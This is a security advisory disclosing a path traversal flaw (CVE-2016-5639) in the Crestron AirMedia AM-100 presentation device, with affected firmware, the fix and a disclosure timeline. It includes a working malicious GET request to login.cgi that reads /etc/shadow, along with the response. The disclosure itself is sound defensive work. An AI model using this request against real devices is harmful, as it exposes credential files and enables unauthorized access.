[CLVA-2016-05-001]: Crestron AM-100 Path Traversal Vulnerability
Summary
Cylance identified a vulnerability in the Crestron AirMedia AM-100, which could allow an unauthenticated entity to read arbitrary files on affected devices. The unauthenticated user must be able to access the web server on the affected devices.
Product Description
The Crestron AirMedia AM-100 allows users to "wirelessly present PowerPoint®, Excel®, Word, and PDF documents, as well as photos, on the room display from their personal iOS® or Android™ mobile device" or desktop/laptop. (via http://www.crestron.com/microsites/airmedia-mobile-wireless-hd-presentations).
Affected Products
- Crestron AirMedia AM-100 (firmware v1.1.1.11 - v1.2.1)
Impact
An unauthenticated entity may be able to read arbitrary files on the affected AM-100 as superuser ("root").
Vulnerability Information
- Cylance Identifier: CLVA-2016-05-001
- CVE Identifier: CVE-2016-5639
Description
A path traversal vulnerability exists in login.cgi (and possibly other binaries in the /home/boa/cgi-bin directory) on the AM-100 embedded web server. The src GET parameter passed to login.cgi specifies the relative path to a file for rendering, such as AwLoginDownload.html. However, the value of this parameter can specify an arbitrary path on the AM-100 filesystem.
Impact
The attacker may be able read the contents of unexpected files and expose sensitive data. Additionally, as the embedded web server runs as root, the attacker is unrestricted by filesystem permissions.
Attack Scenario
An unauthenticated entity with access to the AM-100 embedded web server could, for example, read the system's password file, then conduct a brute force password guessing attack in order to break into an account on the system.
Resolution
Crestron has released firmware version 1.4.0.13 to address this issue. Affected users should update the firmware of their AM-100 as soon as possible. Crestron partners can find the latest firmware at http://www.crestron.com/products/model/AM-100
Credit
- Zach Lanier, Director of Research, Cylance
Additional Information
Details for CLVA-2016-05-001
- Example of a benign/normal
GETrequest forlogin.cgi:
GET http://[AM-100-ADDRESS]/cgi-bin/login.cgi?lang=en&src=AwLoginDownload.html HTTP/1.1
...
- Example of expected response:
HTTP/1.1 200 OK
Content-Type: text/html
Date: Wed, 26 Oct 2005 19:07:53 GMT
Server: lighttpd/1.4.35-devel-4f1e285
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-Type" content="text/html; charset=utf-8">
<meta http-equiv="Cache-control" content="no-cache">
<title>Crestron AirMedia</title>
...
- Example of malicious request for
/etc/shadow(system's password file):
http://[AM-100-ADDRESS]/cgi-bin/login.cgi?lang=en&src=../../../../../../../../etc/shadow
- Response (password hash redacted for privacy reasons):
root:[HASH]:0:0:99999:7:::
CLVA-2016-05-001 Timeline
- Discovery Date: 2016-05-12
- Vendor Notification Date: 2016-05-19
- CERT/CC Contact Date: 2016-05-27
- Vendor Acknowledgement Date: 2016-06-06
- Patch Release Date: 2016-08-01
- Public Disclosure Date: 2016-08-01